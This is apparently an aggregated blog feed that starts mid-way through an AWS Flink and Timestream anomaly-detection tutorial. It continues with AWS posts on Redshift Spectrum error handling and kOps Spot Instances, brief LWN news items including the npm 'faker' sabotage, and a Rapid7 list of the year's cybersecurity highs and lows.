After you’re logged in to the AWS Management console you can deploy the CloudFormation stack. This stack creates a fully configured AWS Cloud9 environment with the related GitHub Repo already in place, a Kinesis data stream, Kinesis Data Firehose delivery stream, Kinesis Data Analytics with Flink app deployed, Timestream database, and an S3 bucket.

After successful deployment, record two important facts from the CloudFormation console: the chosen stack name and the attribute 03Cloud9EnvUrl displayed in the Outputs section of the stack. The attribute's URL will take you directly to our deployed AWS Cloud9 environment.

Run post install step within AWS Cloud9

The deployed stack created an AWS Cloud9 environment and an AWS Identity and Access Management (IAM) instance profile. We apply this instance profile to AWS Cloud9 to interact with Kinesis, Timestream, and Amazon S3 throughout the next steps. The used script also configures and installs other required tools.

1. Open a terminal window.

$ cd flinkAnomalySteps/deployment
$ source c9-postInstall.sh
---SETTING UP IAM INSTANCE PROFILE
Please enter cloudformation stack name (default: flink-rcf-app):
# enter your stack name

Start a Grafana development server

In this section we start a Grafana server using Docker. Cloud9 allows us to expose web applications (for demo and development purposes) on container port 8080.

1. Open a terminal window.

$ cd ../src/grafana-dashboard
$ docker volume create grafana-storage
# this creates a docker volume for persisting your Grafana settings
$./start-grafana.sh
# this starts a recent Grafana using docker with Timestream plugin and a pre-configured dashboard in place

2. Open the preview panel by selecting Preview, and then select Preview Running Application.

3. Next, in the preview pane, select Pop out into new Window.

4. A new browser tab with Grafana opens.

5. Choose any username and password combination.

6. In Grafana, use the “Search dashboards” icon on the left and choose “TEP-SIM-DEV”. This pre-configured dashboard displays data from Amazon Timestream (see the step “Open Grafana dashboard”).

TEP simulation procedure

Within your local or AWS Cloud9 Linux environment, fetch the simulation Docker image from the public AWS container registry, or build the simulation binaries locally; to build manually, check the GitHub repo.

Start simulation (in separate terminal)

# starts container and switch into the container-shell
$ docker run -it --rm \
  --network host \
  --name tesim-runner \
  tesim-runner:01 \
 /bin/bash
# then inside container
$ ./tesim --simtime 100  --external-ctrl
# simulation started…

Manipulate simulation (in separate terminal)

Follow the steps here for a basic process disturbance task. Review the aspects of influencing the simulation in the GitHub repo. The rtclient program has a range of commands for introducing disturbances.

# first switch into running simulation container
$ docker exec -it tesim-runner /bin/bash
# now we can access the shared storage of the simulation process…
$ ./rtclient --setidv 6
# this enables one of the built-in process disturbances (1-20)
$ ./rtclient --setidv 7
$ ./rtclient --setidv 8
$ …

Stream simulation data to Amazon Kinesis Data Streams (in separate terminal)

The client has a built-in record frequency of 50 messages per second. One message contains more than 50 measurements, so we have approximately 2,500 measurements per second.

$ ./rtclient -k

AWS libcrypto resolve: found static libcrypto 1.1.1 HMAC symbols
AWS libcrypto resolve: found static libcrypto 1.1.1 EVP_MD symbols
{"xmeas_1": 3649.739476,"xmeas_2": 4451.32071,"xmeas_3": 9.223142558,"xmeas_4": 32.39290913,"xmeas_5": 47.55975621,"xmeas_6": 2798.975688,"xmeas_7": 64.99582601,"xmeas_8": 122.8987929,"xmeas_9": 0.1978264656,…}
# Messages in JSON sent to Kinesis DataStream visible via stdout

Compile and start Flink Application (optional step)

If you want deeper insights into the Flink application, you can also start it from the AWS Cloud9 instance. Note: this is only appropriate for development.

$ cd flinkAnomalySteps/src
$ cd flink-rcf-app
$ mvn clean compile
# the Flink app gets compiled
$ mvn exec:java -Dexec.mainClass= \
    "com.amazonaws.services.kinesisanalytics.StreamingJob"
# Flink App is started with default settings in place…
…

Open Grafana dashboard (from the step Start a Grafana development server)

Process anomalies are visible instantly after you start the simulation. Use Grafana to drill down into the data as needed.

/** example - simplest possible Timestream query used for visualization **/

SELECT CREATE_TIME_SERIES(time, measure_value::double) AS anomaly_stream6
FROM "kdaflink"."kinesisdata1"
WHERE measure_name = 'anomaly_score_stream6'
  AND time BETWEEN ago(15m) AND now()

Code snippet 4: Timestream SQL example; Timestream database is `kdaflink` – table is `kinesisdata1`
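
If you would rather pull the same data programmatically than view it in Grafana, the Timestream query API can run the statement above. The following is a minimal sketch with the AWS SDK for Python (boto3), reusing the database and table names from Code snippet 4:

import boto3

# Run the same Timestream query programmatically; database/table names as in Code snippet 4.
query_client = boto3.client("timestream-query")

sql = """
SELECT CREATE_TIME_SERIES(time, measure_value::double) AS anomaly_stream6
FROM "kdaflink"."kinesisdata1"
WHERE measure_name = 'anomaly_score_stream6'
  AND time BETWEEN ago(15m) AND now()
"""

result = query_client.query(QueryString=sql)
print(len(result["Rows"]), "rows returned")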

Figure 4 – Grafana dashboard showing near real-time simulation data; three anomalies, mapped to the TEP process stages, are constantly calculated by Flink

S3 raw metrics bucket

For the sake of completeness and potential usefulness, the Flink application also emits all raw data to Kinesis Data Firehose in an intermediate step. The service converts all JSON data to CSV format by using a small AWS Lambda function.

$ aws s3 ls flink-rcf-app-rawmetricsbucket-<CFN-UUID>/tep-raw-csv/2021/11/26/19/

Cleaning up

Delete the deployed CloudFormation stack. All resources (excluding S3 buckets) are permanently deleted.

Conclusion

In this blog post, we learned that in-stream anomaly detection and constant measurement data insights can work together. The Apache Flink framework offers a ready-to-use platform that is mission critical for future adoption across manufacturing and other industries. Other applications of the presented Flink pattern can run on capable edge compute devices. Integration with AWS IoT Greengrass and AWS Greengrass Stream Manager is part of the GitHub repository accompanying this blog.

Another extension includes measurement data pattern detection routines, which can coexist with in-stream anomaly detection and can detect specific failure patterns over time using time-windowing features of the Flink framework. You can refer to the GitHub repo which accompanies this blog post. Give it a try and let us know your feedback in the comments!

Define error handling for Amazon Redshift Spectrum data

Post Syndicated from Ahmed Shehata original https://aws.amazon.com/blogs/big-data/define-error-handling-for-amazon-redshift-spectrum-data/

Amazon Redshift is a fully managed, petabyte-scale data warehouse service in the cloud. Amazon Redshift Spectrum allows you to query open format data directly from the Amazon Simple Storage Service (Amazon S3) data lake without having to load the data into Amazon Redshift tables. With Redshift Spectrum, you can query open file formats such as Apache Parquet, ORC, JSON, Avro, and CSV. This feature of Amazon Redshift enables a modern data architecture that allows you to query all your data to obtain more complete insights.

Amazon Redshift has a standard way of handling data errors in Redshift Spectrum. Data file fields containing any special character are set to null. Character fields longer than the defined table column length get truncated by Redshift Spectrum, whereas numeric fields display the maximum number that can fit in the column. With this newly added user-defined data error handling feature in Amazon Redshift Spectrum, you can now customize data validation and error handling.

This feature provides you with specific methods for handling each of the scenarios for invalid characters, surplus characters, and numeric overflow while processing data using Redshift Spectrum. Also, the errors are captured and visible in the newly created dictionary view SVL_SPECTRUM_SCAN_ERROR. You can even cancel the query when a defined threshold of errors has been reached.

Prerequisites

To demonstrate Redshift Spectrum user-defined data handling, we build an external table over a data file with soccer league information and use that to show different data errors and how the new feature offers different options in dealing with those data errors. We need the following prerequisites:

  • An Amazon Redshift cluster
  • An S3 bucket holding the soccer league data file
  • An AWS Glue Data Catalog database, with an external schema (schema_spectrum_uddh in this post) defined over it

Solution overview

We use the data file for soccer leagues to define an external table to demonstrate different data errors and the different handling techniques offered by the new feature to deal with those errors. The following screenshot shows an example of the data file.

Note the following in the example:

  • The club name can typically be longer than 15 characters
  • The league name can typically be longer than 20 characters
  • The club name Barcelôna includes an invalid character
  • The column nspi includes values that are bigger than the SMALLINT range

Then we create an external table (see the following code) to demonstrate the new user-defined handling:

  • We define the club_name and league_name columns shorter than they should be to demonstrate handling of surplus characters
  • We define the column league_nspi as SMALLINT to demonstrate handling of numeric overflow
  • We use the new table property data_cleansing_enabled to enable custom data handling

CREATE EXTERNAL TABLE schema_spectrum_uddh.soccer_league
(
  league_rank smallint,
  prev_rank   smallint,
  club_name   varchar(15),
  league_name varchar(20),
  league_off  decimal(6,2),
  league_def  decimal(6,2),
  league_spi  decimal(6,2),
  league_nspi smallint
)
ROW FORMAT DELIMITED 
    FIELDS TERMINATED BY ',' 
    LINES TERMINATED BY '\n\l'
stored as textfile
LOCATION 's3://uddh-soccer/league/'
table properties ('skip.header.line.count'='1','data_cleansing_enabled'='true');

Invalid character data handling

With the introduction of the new table and column property invalid_char_handling, you can now choose how you deal with invalid characters in your data. The supported values are as follows:

  • DISABLED – Feature is disabled (no handling).
  • SET_TO_NULL – Replaces the value with null.
  • DROP_ROW – Drops the whole row.
  • FAIL – Fails the query when an invalid UTF-8 value is detected.
  • REPLACE – Replaces the invalid character with a replacement. With this option, you can use the newly introduced table property replacement_char.

The table property can work over the whole table or just a column level. Additionally, you can define the table property during create time or later by altering the table.

When you disable user-defined handling, Redshift Spectrum by default sets the value to null (similar to SET_TO_NULL):

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='DISABLED');

When you change the setting of the handling to DROP_ROW, Redshift Spectrum simply drops the row that has an invalid character:

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='DROP_ROW');

When you change the setting of the handling to FAIL, Redshift Spectrum fails and returns an error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='FAIL');

When you change the setting of the handling to REPLACE and choose a replacement character, Redshift Spectrum replaces the invalid character with the chosen replacement character:

alter table schema_spectrum_uddh.soccer_league
set table properties ('invalid_char_handling'='REPLACE','replacement_char'='?');

Surplus character data handling

As mentioned earlier, we defined the columns club_name and league_name shorter than the actual contents of the corresponding fields in the data file.

With the introduction of the new table property surplus_char_handling, you can choose from multiple options:

  • DISABLED – Feature is disabled (no handling)
  • TRUNCATE – Truncates the value to the column size
  • SET_TO_NULL – Replaces the value with null
  • DROP_ROW – Drops the whole row
  • FAIL – Fails the query when a value is too large for the column

When you disable the user-defined handling, Redshift Spectrum defaults to truncating the surplus characters (similar to TRUNCATE):

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'DISABLED');

When you change the setting of the handling to SET_TO_NULL, Redshift Spectrum sets the column value to NULL for any field that is longer than the defined length:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'SET_TO_NULL');


When you change the setting of the handling to DROP_ROW, Redshift Spectrum drops the row of any field that is longer than the defined length:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'DROP_ROW');

When you change the setting of the handling to FAIL, Redshift Spectrum fails and returns an error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'FAIL');

We need to disable the user-defined data handling for this data error before demonstrating the next type of error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('surplus_char_handling' = 'DISABLED');

Numeric overflow data handling

For this demonstration, we intentionally defined league_nspi as SMALLINT (with a range of -32,768 to +32,767) to show the available options for data handling.

With the introduction of the new table property numeric_overflow_handling, you can choose from multiple options:

  • DISABLED – Feature is disabled (no handling)
  • SET_TO_NULL – Replaces the value with null
  • DROP_ROW – Replaces each value in the row with NULL
  • FAIL – Fails the query when a value is too large for the column

When we look at the source data, we can observe that the top five countries have more points than the SMALLINT field can handle.

When you disable the user-defined handling, Redshift Spectrum defaults to the maximum number the numeric data type can handle; in our case, SMALLINT can hold up to 32,767:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'DISABLED');

When you choose SET_TO_NULL, Redshift Spectrum sets to null the column with numeric overflow:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'SET_TO_NULL');

When you choose DROP_ROW, Redshift Spectrum drops the row containing the column with numeric overflow:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'DROP_ROW');

When you choose FAIL, Redshift Spectrum fails and returns an error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'FAIL');

We need to disable the user-defined data handling for this data error before demonstrating the next type of error:

alter table schema_spectrum_uddh.soccer_league
set table properties ('numeric_overflow_handling' = 'DISABLED');

Stop queries at MAXERROR threshold

You can also choose to stop the query if it reaches a certain threshold in errors by using the newly introduced parameter spectrum_query_maxerror:

Set spectrum_query_maxerror to 7;

The following screenshot shows that the query ran successfully.

However, if you decrease this threshold to a lower number, the query fails because it reached the preset threshold:

Set spectrum_query_maxerror to 6;

Error logging

With the introduction of the new user-defined data handling feature, we also introduced the new view svl_spectrum_scan_error, which allows you to view a useful sample of the error logs. The table contains the query, file, row, column, error code, the handling action that was applied, as well as the original value and the modified (resulting) value. See the following code:

SELECT *
FROM svl_spectrum_scan_error
where location = 's3://uddh-soccer/league/spi_global_rankings.csv'
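
You can run this check from the Amazon Redshift query editor, or programmatically. As one possible approach, here is a hedged sketch using the Amazon Redshift Data API via boto3; the cluster identifier, database, and database user are placeholders for your own environment:

import boto3

# Placeholder cluster/database/user names; adjust for your environment.
rsd = boto3.client("redshift-data")

resp = rsd.execute_statement(
    ClusterIdentifier="my-redshift-cluster",
    Database="dev",
    DbUser="awsuser",
    Sql=(
        "SELECT * FROM svl_spectrum_scan_error "
        "WHERE location = 's3://uddh-soccer/league/spi_global_rankings.csv'"
    ),
)
print(resp["Id"])  # statement ID; fetch results with get_statement_result once it finishes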

Clean up

To avoid incurring future charges, complete the following steps:

  1. Delete the Amazon Redshift cluster created for this demonstration. If you were using an existing cluster, drop the created external table and external schema.
  2. Delete the S3 bucket.
  3. Delete the AWS Glue Data Catalog database.

Conclusion

In this post, we demonstrated Redshift Spectrum’s newly added feature of user-defined data error handling and showed how this feature provides the flexibility to take a user-defined approach to deal with data exceptions in processing external files. We also demonstrated how the logging enhancements provide transparency on the errors encountered in external data processing without needing to write additional custom code.

We look forward to hearing from you about your experience. If you have questions or suggestions, please leave a comment.


About the Authors

Ahmed Shehata is a Data Warehouse Specialist Solutions Architect with Amazon Web Services, based out of Toronto.

Milind Oke is a Data Warehouse Specialist Solutions Architect based out of New York. He has been building data warehouse solutions for over 15 years and specializes in Amazon Redshift. He is focused on helping customers design and build enterprise-scale well-architected analytics and decision support platforms.

Efficiently Scaling kOps clusters with Amazon EC2 Spot Instances

Post Syndicated from Pranaya Anshu original https://aws.amazon.com/blogs/compute/efficiently-scaling-kops-clusters-with-amazon-ec2-spot-instances/

This post is written by Carlos Manzanedo Rueda, WW SA Leader for EC2 Spot, and Brandon Wagner, Senior Software Development Engineer for EC2.

This post focuses on how you can leverage recently released tools to optimize your usage of Amazon EC2 Spot Instances on Kubernetes Operations (kOps) clusters. Spot Instances let you utilize unused capacity in the AWS cloud for up to 90% off compared to On-Demand prices, and they are a great fit for fault-tolerant, containerized applications. kOps is an open source project providing a cohesive toolset for provisioning, operating, and deleting Kubernetes clusters in the cloud.

Even with customers such as Snap Inc., Babylon Health, and Fidelity Investments telling us how Amazon Elastic Kubernetes Service (EKS) is essential for running their containerized workloads, we appreciate that there are scenarios where using Amazon EC2 instances and kOps is a viable alternative. At AWS, we understand “one size does not fit all.” While we encourage Kubernetes users to contribute their feedback to the AWS container roadmap so that we can improve our services, we also would like to reduce heavy lifting and simplify Spot best practices integration in kOps clusters.

To simplify the integration of Spot Instances in kOps clusters, in January of 2021 we introduced a new kops toolbox command: kops toolbox instance-selector. The utility is included in the standard kOps distribution, and it simplifies the creation of kOps Instance Groups by configuring them with full adherence to Spot Instances best practices.

Handling Spot interruption notifications in Kubernetes

Let’s quickly recap Spot best practices. Spot Instances perform exactly like any other EC2 Instances, except that in exchange for their discounted price, they can be interrupted with a two-minute warning when EC2 must reclaim capacity. Applications running on Spot can typically recover from transient interruptions by simply starting a new instance. Spot best practices involve measures such as diversifying into as many Spot capacity pools as possible, choosing the right Spot allocation strategy, and utilizing Spot integrated services. These handle the Spot Instances lifecycles for you. This blog post on handling Spot interruptions dives deeper into AWS’s EC2 Spot best practices.

In Kubernetes, to handle spot termination and rebalance recommendation events (both explained in this blog post on proactively managing Spot Instance lifecycle), we utilize the AWS open-source project AWS Node Termination Handler. We will be deploying the Node Termination Handler as a kOps managed addon, which simplifies its setup and configuration.

The Node Termination Handler ensures that the Kubernetes control plane responds appropriately to events that can make EC2 instances unavailable. It can be operated in two different modes: Instance Metadata Service (IMDS), deployed as a DaemonSet, or Queue Processor, deployed as a Deployment Controller. We recommend running it in Queue Processor mode. The Queue Processor controller continuously monitors an Amazon Simple Queue Service (SQS) queue for events received from Amazon EventBridge. This can lead to node termination in your cluster. When one of these events is received, the Node Termination Handler notifies the Kubernetes control plane to cordon and drain the node that is about to be interrupted. Then, the kubelet sends a SIGTERM signal to the Pods and containers running on the node. This lets your application proceed with a graceful termination – one of the recommended best practices of a Twelve-Factor App.
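
On the application side, a graceful termination usually amounts to trapping SIGTERM and finishing in-flight work before exiting. A minimal sketch of this pattern in Python follows; it is not specific to the Node Termination Handler and the work loop is a placeholder.

import signal
import sys
import time

shutting_down = False

def handle_sigterm(signum, frame):
    # Kubernetes sends SIGTERM when the node is cordoned and drained;
    # stop accepting new work and let in-flight work finish.
    global shutting_down
    shutting_down = True

signal.signal(signal.SIGTERM, handle_sigterm)

while not shutting_down:
    time.sleep(1)  # placeholder for the application's real work loop

# flush buffers, close connections, then exit cleanly
sys.exit(0)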

The kOps managed addon will let you configure the Node Termination Handler within your kOps cluster spec and, more importantly, manage provisioning the necessary infrastructure for you.

To deploy the AWS Node Termination Handler, we start by editing our cluster spec:

kops edit cluster --name ${KOPS_CLUSTER_NAME}

We append the nodeTerminationHandler configuration to the spec node:

spec:
  nodeTerminationHandler:
    enabled: true
    enableSQSTerminationDraining: true
    managedASGTag: "aws-node-termination-handler/managed"

Finally, we deploy the changes made to our cluster configuration:

kops update cluster --name ${KOPS_CLUSTER_NAME} --state ${KOPS_STATE_STORE} --yes --admin

${KOPS_CLUSTER_NAME} refers to the environment variable containing the cluster name, and ${KOPS_STATE_STORE} indicates the Amazon Simple Storage Service (S3) bucket – or kOps State Store – where kOps configuration is stored.

To check that your Node Termination Handler deployment was successful, you can execute:

kubectl get deployment aws-node-termination-handler -n kube-system

Instance Flexibility and Diversification

Diversification and selection of multiple instance types is essential to acquire and maintain Spot capacity, as well as to successfully replace interrupted instances with others from different pools. When running kOps on AWS, this is implemented by utilizing Amazon EC2 Auto Scaling. The Auto Scaling group's capacity-optimized allocation strategy ensures that Spot capacity is provisioned from the optimal pools, thereby reducing the chances of Spot terminations.
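
kOps provisions the underlying Auto Scaling groups for you, so you normally never create them by hand. Purely to illustrate what a mixed-instances, capacity-optimized group looks like at the API level, here is a sketch using boto3; the group name, launch template, instance types, and subnets are placeholders, and the exact configuration kOps generates may differ.

import boto3

# Illustration only: kOps creates and manages the Auto Scaling group for you.
# All names (group, launch template, subnets) below are placeholders.
autoscaling = boto3.client("autoscaling")

autoscaling.create_auto_scaling_group(
    AutoScalingGroupName="spot-group-1",
    MinSize=2,
    MaxSize=15,
    VPCZoneIdentifier="subnet-aaaa,subnet-bbbb,subnet-cccc",
    MixedInstancesPolicy={
        "LaunchTemplate": {
            "LaunchTemplateSpecification": {
                "LaunchTemplateName": "spot-group-1-template",  # hypothetical template
                "Version": "$Latest",
            },
            "Overrides": [
                {"InstanceType": "m3.xlarge"},
                {"InstanceType": "m4.xlarge"},
                {"InstanceType": "m5.xlarge"},
                {"InstanceType": "m5a.xlarge"},
            ],
        },
        "InstancesDistribution": {
            "OnDemandBaseCapacity": 0,
            "OnDemandPercentageAboveBaseCapacity": 0,
            "SpotAllocationStrategy": "capacity-optimized",
        },
    },
)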

Simplifying adoption of Spot Best practices on kOps

Before the kops toolbox instance-selector, you would have to setup Spot best practices on kOps manually. This involved writing a stub file following the InstanceGroup specification and examples, and then implementing every best practice, including finding every pool that qualifies for our workload.

The new functionality in kops toolbox instance-selector simplifies InstanceGroup creation by moving the focus of kOps users and administrators from this manual configuration over to simply selecting the vCPUs and memory requirements for their application (or a base instance type), and then letting kops toolbox instance-selector define the right configuration. Behind the scenes, it utilizes a library allowing it to plug into the feature set of Amazon EC2 instance selector. At its core, ec2-instance-selector helps you select compatible instance types for your application to run on. Utilize the ec2-instance-selector CLI or library when automating your configurations. In the case of kOps, the integration already comes in the kops toolbox.

For example, let’s say your cluster runs stateless, fault tolerant applications that are CPU/Memory bound and have a ratio of vCPU to Memory requiring at least 1vCPU : 4GB of RAM. You can run the following command in order to acquire cluster spot capacity:

kops toolbox instance-selector "spot-group-" \
  --usage-class spot --flexible --cluster-autoscaler \
  --vcpus-to-memory-ratio="1:4" \
  --ig-count 2

Let’s focus first on the command, and later cover its output. You can get a list of parameters and default values by running: kops toolbox instance-selector –help. A few default parameters weren’t passed in the command above, but they will be set to sane defaults, such as the maximum and minimum number of instances in the Instance Group. The parameter –flexible refers to our request to provide a group of flexible instance types spanning multiple generations.

Once you’ve defined the InstanceGroups, start them up by using the command:

kops update cluster \
--state=${KOPS_STATE_STORE} \
--name=${KOPS_CLUSTER_NAME} \
--yes --admin

The two commands above define and create a request for spot capacity from a flexible and diversified pool set, which meet the criteria to provide at least 4GB of RAM for each vCPU. The command creates not just one, but two node groups named “spot-group-1” and “spot-group-2” (–ig-count 2).

Now, let’s check the contents of the configuration file generated by kops toolbox instance-selector. To preview a configuration without making changes, add –dry-run –output yaml.

apiVersion: kops.k8s.io/v1alpha2
kind: InstanceGroup
metadata:
  creationTimestamp: "2020-08-11T10:22:16Z"
  labels:
    kops.k8s.io/cluster: spot-kops-cluster.k8s.local
  name: spot-group-1
spec:
  cloudLabels:
    k8s.io/cluster-autoscaler/enabled: "1"
    k8s.io/cluster-autoscaler/spot-kops-cluster.k8s.local: "1"
    kops.k8s.io/instance-selector: "1"
  image: 099720109477/ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-20200716
  machineType: m3.xlarge
  maxSize: 15
  minSize: 2
  mixedInstancesPolicy:
    instances:
    - m3.xlarge
    - m4.xlarge
    - m5.xlarge
    - m5a.xlarge
    - t2.xlarge
    - t3.xlarge
    onDemandAboveBase: 0
    onDemandBase: 0
    spotAllocationStrategy: capacity-optimized
  nodeLabels:
    kops.k8s.io/instancegroup: spot-group-1
  role: Node
  subnets:
  - eu-west-1a
  - eu-west-1b
  - eu-west-1c
...

The configuration above lists one of the groups created by kops toolbox instance-selector in the previous example. The second group will have a very similar make-up and format, except that it will refer to instances such as: r3.xlarge, r4.xlarge, r5.xlarge, and r5a.xlarge in the mixedInstancesPolicy section. By defining the parameter --usage-class to Spot, the configuration created by kops toolbox instance-selector will add the tags identifying this Auto Scaling group as a Spot group. When the nodes are initialized, the kOps controller will identify the nodes as Spot and add the label node-role.kubernetes.io/spot-worker=true. Therefore, at a later stage, we can apply placement logic to our cluster by using nodeSelector and affinity. The configuration above adheres to the definition of kOps support for mixed Instance Groups in AWS, and adds all of the right cloudLabels in order to integrate and implement not only with Spot best practices, but also with Cluster Autoscaler Auto-Discovery configuration best practices.

Kubernetes Cluster Autoscaler is a Kubernetes controller that dynamically adjusts the cluster size. According to a 2020 survey by Cloud Native Computing Foundation (CNCF), 70% of Kubernetes workloads plan to autoscale their stateless applications. Dynamically scaling applications and clusters is also a great practice for optimizing your system costs in situations where capacity is unnecessary, as well as for scaling out accordingly in order to meet business demands. If there are Pods that can’t be scheduled due to insufficient resources, then Cluster Autoscaler will issue a Scale-out action. When there are nodes in the cluster that have been under-utilized for a configurable period of time, Cluster Autoscaler will Scale-in the cluster, and even down-scale to 0 instances when applications don’t need to be run.

On Scale-out operations, Cluster Autoscaler evaluates a set of node groups. When Cluster Autoscaler runs on AWS, node groups are implemented by using Auto Scaling groups (referring to the same instance group as a kOps Instance Group). Therefore, to calculate the number of nodes to scale-out, Cluster Autoscaler assumes that every instance in a node group has the same number of vCPUs and memory size.

By creating two node groups, you apply two diversification levels. You diversify within each node group by using an Auto Scaling group with Mixed Instance Policies and capacity-optimized allocation strategy. Then, to increase the pool range you can leverage, you add more than one node group, while still adhering to the best practices required by Cluster Autoscaler.

While we’ve been focusing on Spot Instances, the parameter –usage-class can be utilized to get OnDemand instances instead of Spot. In the next example, let’s say we would like to get On-Demand capacity in order to train complex deep learning models that will take hours to run. To train our models, we need instances that have at least one GPU with 16GB of RAM on instances that have at least 32GB Ram and 8 vCPUs.

kops toolbox instance-selector "ondemand-gpu-group" \
  --gpus-min 1 --gpu-memory-total-min 16gb --memory-min 32gb --vcpus 8 \
  --node-count-max 4 --node-count-min 4 --cpu-architecture amd64

The command above, followed by kops update cluster --state=${KOPS_STATE_STORE} --name=${KOPS_CLUSTER_NAME} --yes, can be utilized to produce a configuration and create a nodegroup with the right requirements. This could be created at the start of the training procedure, and then – once the training is done and the capacity is no longer needed – you could automate the nodegroup removal with the following command:

kops delete instancegroup ondemand-gpu-group --name ${KOPS_CLUSTER_NAME} --yes

Conclusions

We believe the best way to run Kubernetes on AWS is by using Amazon EKS. However, scenarios may exist where kOps is utilized in AWS. By using the kOps managed add-on to install aws-node-termination-handler and kops toolbox instance-selector, it is easier than ever to apply Spot best practices to Kubernetes workloads on kOps, and cost-optimize fault-tolerant, stateless applications. These tools let kOps workloads gracefully terminate applications, as well as proactively handle the replacement of instances that are at an elevated risk of termination. kops toolbox instance-selector leverages Amazon ec2-instance-selector in order to simplify the creation of Instance Group configurations adhering to Spot Instances best practices, implementing instance type flexibility, and utilizing capacity-optimized allocation strategy.

By adhering to these best practices to reduce the frequency of Spot interruptions, we will optimize not only the cost, but also our Spot Instances selection. This will enable us to acquire capacity at a massive scale if necessary.

To start using the tools we have described, follow along this step-by-step tutorial. Also, head over to the kops toolbox documentation to learn more about the ways in which you can use it.

Looking back at 2021, looking forward at 2022 (Libre Arts)

Post Syndicated from original https://lwn.net/Articles/880811/rss

Here is a comprehensive look on the Libre Arts site at the current state of free software for creative artists.

The other reason is that, with a project like GIMP, it’s hard to do just one thing. The team is constantly bombarded with requests that are mostly doable once you have a team of 10 to 20 full-time developers, which is light years away from where GIMP is now. Which results in a lot of running around between under-the-hood work, UX fixes, featurettes, better file formats support etc. So you give everyone a little of what they want but you end up delaying an actual release because the big stuff still needs to happen.

Dev corrupts NPM libs ‘colors’ and ‘faker’ breaking thousands of apps (Bleeping Computer)

Post Syndicated from original https://lwn.net/Articles/880809/rss

Bleeping Computer reports on the latest NPM mess: the developer of the “faker” module deleted the code and its development history from GitHub (with a force push), replaced it with a malicious alternative, and broke dependencies for numerous applications.

The reason behind this mischief on the developer’s part appears to be retaliation—against mega-corporations and commercial consumers of open-source projects who extensively rely on cost-free and community-powered software but do not, according to the developer, give back to the community.

GitHub has evidently called this action a violation of its terms of service and disabled the owner’s account; NPM has restored a previous version of the code.

The 2021 Naughty and Nice Lists: Cybersecurity Edition

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/01/10/the-2021-naughty-and-nice-lists-cybersecurity-edition/

The 2021 Naughty and Nice Lists: Cybersecurity Edition

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

It’s not just Santa who gets to have all the fun — we in the security community also love to make our lists and check them twice. That’s why we asked some of our trusty cybersecurity go-to’s who and what they’d place on their industry-specific naughty and nice lists, respectively, for 2021. Here’s who the experts we talked to would like to give a super-stuffed stocking filled with tokens of gratitude — and who’s getting a lump of coal.

The nice list

Call me boring, but I am pretty stoked about the Minimum Viable Security Product (MVSP), the vendor-neutral checklist for vetting third-party companies. It has questions like whether a vendor performs annual comprehensive penetration testing on systems, complies with local laws and regulations like GDPR, implemented single sign-on, applies security patches on a frequent basis, maintains a list of sensitive data types that the application is expected to process, keeps an up-to-date data flow diagram indicating how sensitive data reaches the systems, and whether vendors have layered perimeter controls or entry and exit logs for physical security. Its success depends on people using it, and this industry tends to be allergic to checklists, but it strikes me as super important. – Fahmida Y. Rashid, award-winning infosec journalist

Editor’s note: Check out our Security Nation podcast episode with Chris John Riley on his work helping develop MVSP.

All of the security researchers who have focused their research and efforts on identifying vulnerabilities and security issues within IoT technology over the last year. Their efforts have helped bring focus to these issues, which has led to improvements in products and processes in the IoT industry. – Deral Heiland, IoT Research Lead at Rapid7

Increased federal government focus on securing critical infrastructure. Examples: pipeline and rail cybersecurity directives, energy sector sprints, cybersecurity funding in the infrastructure package. – Harley Geiger, Senior Director of Public Policy at Rapid7

Huntress Labs and the Reddit r/msp board for their outstanding, tireless support for those responding to the Kaseya mass ransomware attack. While the attack was devastating, the community coalesced to help triage and recover, showing the power we have as defenders and protectors when we all work together. – Bob Rudis, Chief Security Data Scientist at Rapid7

The January 20th swearing-in of Biden is on the nice list, not because of who won but the fact that the election worked. We’ve talked an excessive amount about election security, but the reality is, there was no big deal. It was a largely unremarkable election even in the abnormal environments of the pandemic and the cyber. Election computers will continue to be wildly insecure, but since we’ve got paper trails, it won’t really matter. – Rob Graham, CEO of Errata Security

The naughty list

The Colonial Pipeline and Kaseya attacks are far above any other “naughty” case. They affected millions of people around the world. However, like the big things from past years, I think it’ll be solved by lots of small actions by individuals rather than some big Government or Corporation initiative. No big action was needed to solve notPetya or Mirai; no big action will be needed here. Those threatened will steadily (albeit slowly) respond. – Rob Graham, CEO of Errata Security

Microsoft, bar none. They bungled the response to many critical in-year vulnerabilities, putting strain on already beat-up teams of protectors and causing many organizations to suffer at the mercy of attackers. Everything from multiple, severe Exchange vulnerabilities, to unfixable print spooler flaws, to being the #1 cloud document service for hosting malicious content. – Bob Rudis, Chief Security Data Scientist at Rapid7

The whole Pegasus spyware from NSO Group is bad news start to finish, but the fact that the ruler of the United Arab Emirates used the spyware on his wife in a custody battle? That was just flabbergasting. We talk about stalkerware and other types of spyware — but when you have something like Pegasus just showing up on individual phones, that is downright frightening. – Fahmida Y. Rashid, award-winning infosec journalist

All manufacturers of IoT technology that have not heeded the warnings, taken advantage of the work done by IoT security researchers to improve their product security, or made efforts to build and improve their internal and external processes for reporting and remediating security vulnerabilities within their products. – Deral Heiland, IoT Research Lead at Rapid7

